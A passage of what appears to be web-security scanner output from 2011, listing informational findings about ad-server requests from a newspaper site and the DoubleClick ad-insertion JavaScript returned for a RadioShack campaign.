Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:32:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1170717655?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1170717655?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1170717655?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1170717655?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.118. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:22:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1542712710?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1542712710?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1542712710?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1542712710?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.119. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/703327951/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=703327951?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/703327951/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=703327951?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/703327951/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=703327951?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=703327951?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.120. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:51:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3180
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=17382567?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=17382567?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=17382567?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=17382567?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.121. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3180
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/10626607/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=10626607?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/10626607/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=10626607?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/10626607/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=10626607?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=10626607?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.122. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/18360874151@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/18360874151@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/18360874151@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49,8360874151,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=13094541/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296268201

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49,8360874151,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=13094541/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1911576582/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1911576582?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49,8360874151,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=13094541/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1911576582/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1911576582?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49,8360874151,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=13094541/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1911576582/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1911576582?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1911576582?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.123. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1202403029/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1202403029?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1202403029/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1202403029?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
